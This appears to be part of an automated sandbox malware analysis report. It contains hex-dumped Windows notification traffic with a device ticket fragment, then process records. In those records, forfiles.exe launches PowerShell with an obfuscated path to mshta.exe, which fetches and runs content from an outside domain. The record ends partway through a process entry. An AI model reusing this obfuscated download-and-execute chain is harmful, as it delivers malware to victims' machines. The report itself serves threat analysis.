                                                                                                                                                                                                                  2024-12-18 20:06:46 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 44 6d 58 4b 4e 2f 65 32 36 6b 79 38 6b 39 65 78 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 63 61 65 62 38 32 66 36 62 37 66 38 65 33 32 33 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 55 46 79 53 6e 31 48 6a 30 63 66 72 4b 67 53 78 4c 50 69 62 37 61 54 72 6f 4b 42 63 2b 6d 73 57 42 47 34 42 43 71 6f 64 63 2b 43 75 62 77 63 63 61 62 4e 66 41 55 46 36 41 54 69 79 4a 6b 58 35 61 53 38 35 67 50 2b 36 6c 72 6a 73 6a 48 47 35 2b 32 4d 4a 75 52 4a 61 52 35 35 47 69 34 30 6b 78 37 69 71 37 69 4a 64 6d 54 2b 6c 7a
                                                                                                                                                                                                                  Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: DmXKN/e26ky8k9ex.2Context: caeb82f6b7f8e323<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAUFySn1Hj0cfrKgSxLPib7aTroKBc+msWBG4BCqodc+CubwccabNfAUF6ATiyJkX5aS85gP+6lrjsjHG5+2MJuRJaR55Gi40kx7iq7iJdmT+lz
                                                                                                                                                                                                                  2024-12-18 20:06:46 UTC74OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 35 36 0d 0a 4d 53 2d 43 56 3a 20 44 6d 58 4b 4e 2f 65 32 36 6b 79 38 6b 39 65 78 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 63 61 65 62 38 32 66 36 62 37 66 38 65 33 32 33 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: BND 3 CON\QOS 56MS-CV: DmXKN/e26ky8k9ex.3Context: caeb82f6b7f8e323
                                                                                                                                                                                                                  2024-12-18 20:06:47 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                                                  Data Ascii: 202 1 CON 58
                                                                                                                                                                                                                  2024-12-18 20:06:47 UTC58INData Raw: 4d 53 2d 43 56 3a 20 47 63 66 76 53 71 5a 31 36 6b 6d 35 69 70 6c 4b 6a 4f 68 48 2f 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                                                  Data Ascii: MS-CV: GcfvSqZ16km5iplKjOhH/A.0Payload parsing failed.


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                  22192.168.2.64992020.198.118.190443
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  2024-12-18 20:07:08 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 38 62 73 50 64 6d 37 43 77 30 6d 7a 2f 32 65 63 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 34 63 65 32 61 32 36 64 33 36 39 35 37 36 31 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: CNT 1 CON 305MS-CV: 8bsPdm7Cw0mz/2ec.1Context: a4ce2a26d3695761
                                                                                                                                                                                                                  2024-12-18 20:07:08 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                                                  Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                                                                  2024-12-18 20:07:08 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 38 62 73 50 64 6d 37 43 77 30 6d 7a 2f 32 65 63 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 34 63 65 32 61 32 36 64 33 36 39 35 37 36 31 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 55 46 79 53 6e 31 48 6a 30 63 66 72 4b 67 53 78 4c 50 69 62 37 61 54 72 6f 4b 42 63 2b 6d 73 57 42 47 34 42 43 71 6f 64 63 2b 43 75 62 77 63 63 61 62 4e 66 41 55 46 36 41 54 69 79 4a 6b 58 35 61 53 38 35 67 50 2b 36 6c 72 6a 73 6a 48 47 35 2b 32 4d 4a 75 52 4a 61 52 35 35 47 69 34 30 6b 78 37 69 71 37 69 4a 64 6d 54 2b 6c 7a
                                                                                                                                                                                                                  Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: 8bsPdm7Cw0mz/2ec.2Context: a4ce2a26d3695761<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAUFySn1Hj0cfrKgSxLPib7aTroKBc+msWBG4BCqodc+CubwccabNfAUF6ATiyJkX5aS85gP+6lrjsjHG5+2MJuRJaR55Gi40kx7iq7iJdmT+lz
                                                                                                                                                                                                                  2024-12-18 20:07:08 UTC74OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 35 36 0d 0a 4d 53 2d 43 56 3a 20 38 62 73 50 64 6d 37 43 77 30 6d 7a 2f 32 65 63 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 34 63 65 32 61 32 36 64 33 36 39 35 37 36 31 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: BND 3 CON\QOS 56MS-CV: 8bsPdm7Cw0mz/2ec.3Context: a4ce2a26d3695761
                                                                                                                                                                                                                  2024-12-18 20:07:08 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                                                  Data Ascii: 202 1 CON 58
                                                                                                                                                                                                                  2024-12-18 20:07:08 UTC58INData Raw: 4d 53 2d 43 56 3a 20 56 56 6f 55 43 33 66 69 4e 55 69 2f 35 44 73 72 75 37 4b 56 49 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                                                  Data Ascii: MS-CV: VVoUC3fiNUi/5Dsru7KVIg.0Payload parsing failed.


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                  23192.168.2.64992620.198.118.190443
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  2024-12-18 20:07:10 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 63 54 4d 4d 74 53 44 6a 63 55 75 44 68 49 47 35 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 61 66 38 37 61 31 30 33 30 36 36 65 37 39 38 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: CNT 1 CON 305MS-CV: cTMMtSDjcUuDhIG5.1Context: 2af87a103066e798
                                                                                                                                                                                                                  2024-12-18 20:07:10 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                                                  Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                                                                  2024-12-18 20:07:10 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 63 54 4d 4d 74 53 44 6a 63 55 75 44 68 49 47 35 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 61 66 38 37 61 31 30 33 30 36 36 65 37 39 38 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 55 46 79 53 6e 31 48 6a 30 63 66 72 4b 67 53 78 4c 50 69 62 37 61 54 72 6f 4b 42 63 2b 6d 73 57 42 47 34 42 43 71 6f 64 63 2b 43 75 62 77 63 63 61 62 4e 66 41 55 46 36 41 54 69 79 4a 6b 58 35 61 53 38 35 67 50 2b 36 6c 72 6a 73 6a 48 47 35 2b 32 4d 4a 75 52 4a 61 52 35 35 47 69 34 30 6b 78 37 69 71 37 69 4a 64 6d 54 2b 6c 7a
                                                                                                                                                                                                                  Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: cTMMtSDjcUuDhIG5.2Context: 2af87a103066e798<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAUFySn1Hj0cfrKgSxLPib7aTroKBc+msWBG4BCqodc+CubwccabNfAUF6ATiyJkX5aS85gP+6lrjsjHG5+2MJuRJaR55Gi40kx7iq7iJdmT+lz
                                                                                                                                                                                                                  2024-12-18 20:07:10 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 63 54 4d 4d 74 53 44 6a 63 55 75 44 68 49 47 35 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 61 66 38 37 61 31 30 33 30 36 36 65 37 39 38 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                                                                                                                                                  Data Ascii: BND 3 CON\WNS 0 197MS-CV: cTMMtSDjcUuDhIG5.3Context: 2af87a103066e798<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                                                                                                                                  2024-12-18 20:07:11 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                                                  Data Ascii: 202 1 CON 58
                                                                                                                                                                                                                  2024-12-18 20:07:11 UTC58INData Raw: 4d 53 2d 43 56 3a 20 61 31 34 6f 54 34 67 47 59 6b 4f 4e 64 44 2b 35 31 4d 63 69 50 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                                                  Data Ascii: MS-CV: a14oT4gGYkONdD+51MciPw.0Payload parsing failed.


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                  24192.168.2.64998220.198.118.190443
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  2024-12-18 20:07:34 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 6e 6a 37 67 62 4e 39 56 4c 55 71 69 36 70 55 63 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 32 38 36 33 31 62 66 63 31 65 36 39 37 30 61 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: CNT 1 CON 305MS-CV: nj7gbN9VLUqi6pUc.1Context: 728631bfc1e6970a
                                                                                                                                                                                                                  2024-12-18 20:07:34 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                                                  Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                                                                  2024-12-18 20:07:34 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 6e 6a 37 67 62 4e 39 56 4c 55 71 69 36 70 55 63 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 32 38 36 33 31 62 66 63 31 65 36 39 37 30 61 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 55 46 79 53 6e 31 48 6a 30 63 66 72 4b 67 53 78 4c 50 69 62 37 61 54 72 6f 4b 42 63 2b 6d 73 57 42 47 34 42 43 71 6f 64 63 2b 43 75 62 77 63 63 61 62 4e 66 41 55 46 36 41 54 69 79 4a 6b 58 35 61 53 38 35 67 50 2b 36 6c 72 6a 73 6a 48 47 35 2b 32 4d 4a 75 52 4a 61 52 35 35 47 69 34 30 6b 78 37 69 71 37 69 4a 64 6d 54 2b 6c 7a
                                                                                                                                                                                                                  Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: nj7gbN9VLUqi6pUc.2Context: 728631bfc1e6970a<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAUFySn1Hj0cfrKgSxLPib7aTroKBc+msWBG4BCqodc+CubwccabNfAUF6ATiyJkX5aS85gP+6lrjsjHG5+2MJuRJaR55Gi40kx7iq7iJdmT+lz
                                                                                                                                                                                                                  2024-12-18 20:07:34 UTC74OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 35 36 0d 0a 4d 53 2d 43 56 3a 20 6e 6a 37 67 62 4e 39 56 4c 55 71 69 36 70 55 63 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 32 38 36 33 31 62 66 63 31 65 36 39 37 30 61 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: BND 3 CON\QOS 56MS-CV: nj7gbN9VLUqi6pUc.3Context: 728631bfc1e6970a
                                                                                                                                                                                                                  2024-12-18 20:07:35 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                                                  Data Ascii: 202 1 CON 58
                                                                                                                                                                                                                  2024-12-18 20:07:35 UTC58INData Raw: 4d 53 2d 43 56 3a 20 6a 6b 44 41 37 64 35 30 67 30 32 7a 76 71 71 71 2f 4d 37 39 62 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                                                  Data Ascii: MS-CV: jkDA7d50g02zvqqq/M79bA.0Payload parsing failed.


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                  25192.168.2.65004420.198.119.143443
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  2024-12-18 20:08:01 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 75 35 38 59 6c 70 76 46 2b 55 36 66 31 47 4b 50 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 66 31 33 30 61 37 62 63 62 65 66 63 61 36 63 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: CNT 1 CON 305MS-CV: u58YlpvF+U6f1GKP.1Context: 1f130a7bcbefca6c
                                                                                                                                                                                                                  2024-12-18 20:08:01 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                                                  Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                                                                  2024-12-18 20:08:01 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 75 35 38 59 6c 70 76 46 2b 55 36 66 31 47 4b 50 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 66 31 33 30 61 37 62 63 62 65 66 63 61 36 63 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 55 46 79 53 6e 31 48 6a 30 63 66 72 4b 67 53 78 4c 50 69 62 37 61 54 72 6f 4b 42 63 2b 6d 73 57 42 47 34 42 43 71 6f 64 63 2b 43 75 62 77 63 63 61 62 4e 66 41 55 46 36 41 54 69 79 4a 6b 58 35 61 53 38 35 67 50 2b 36 6c 72 6a 73 6a 48 47 35 2b 32 4d 4a 75 52 4a 61 52 35 35 47 69 34 30 6b 78 37 69 71 37 69 4a 64 6d 54 2b 6c 7a
                                                                                                                                                                                                                  Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: u58YlpvF+U6f1GKP.2Context: 1f130a7bcbefca6c<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAUFySn1Hj0cfrKgSxLPib7aTroKBc+msWBG4BCqodc+CubwccabNfAUF6ATiyJkX5aS85gP+6lrjsjHG5+2MJuRJaR55Gi40kx7iq7iJdmT+lz
                                                                                                                                                                                                                  2024-12-18 20:08:01 UTC74OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 35 36 0d 0a 4d 53 2d 43 56 3a 20 75 35 38 59 6c 70 76 46 2b 55 36 66 31 47 4b 50 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 66 31 33 30 61 37 62 63 62 65 66 63 61 36 63 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: BND 3 CON\QOS 56MS-CV: u58YlpvF+U6f1GKP.3Context: 1f130a7bcbefca6c
                                                                                                                                                                                                                  2024-12-18 20:08:02 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                                                  Data Ascii: 202 1 CON 58
                                                                                                                                                                                                                  2024-12-18 20:08:02 UTC58INData Raw: 4d 53 2d 43 56 3a 20 51 57 76 46 49 5a 65 6c 53 30 36 79 34 58 58 6a 43 52 32 77 46 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                                                  Data Ascii: MS-CV: QWvFIZelS06y4XXjCR2wFQ.0Payload parsing failed.


                                                                                                                                                                                                                  Statistics

                                                                                                                                                                                                                  CPU Usage

                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                  Memory Usage

                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                  High Level Behavior Distribution

                                                                                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                                                                                  Behavior

                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                  System Behavior

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Target ID:0
                                                                                                                                                                                                                  Start time:15:05:56
                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                  Path:C:\Windows\System32\forfiles.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:"C:\Windows\System32\forfiles.exe" /p C:\Windows\System32 /m cmmon32.exe /c "powershell . \*i*\*2\msh*e https://tiffany-careers.com/FILEANH
                                                                                                                                                                                                                  Imagebase:0x7ff706130000
                                                                                                                                                                                                                  File size:52'224 bytes
                                                                                                                                                                                                                  MD5 hash:9BB67AEA5E26CB136F23F29CC48D6B9E
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Target ID:1
                                                                                                                                                                                                                  Start time:15:05:56
                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Target ID:3
                                                                                                                                                                                                                  Start time:15:05:56
                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:. \*i*\*2\msh*e https://tiffany-careers.com/FILEANH
                                                                                                                                                                                                                  Imagebase:0x7ff6e3d50000
                                                                                                                                                                                                                  File size:452'608 bytes
                                                                                                                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Target ID:4
                                                                                                                                                                                                                  Start time:15:05:58
                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                  Path:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:"C:\Windows\System32\mshta.exe" https://tiffany-careers.com/FILEANH
                                                                                                                                                                                                                  Imagebase:0x7ff635a40000
                                                                                                                                                                                                                  File size:14'848 bytes
                                                                                                                                                                                                                  MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Target ID:7
                                                                                                                                                                                                                  Start time:15:06:01
                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                                  Imagebase:0x7ff7403e0000
                                                                                                                                                                                                                  File size:55'320 bytes
                                                                                                                                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Target ID:8
                                                                                                                                                                                                                  Start time:15:06:02
                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
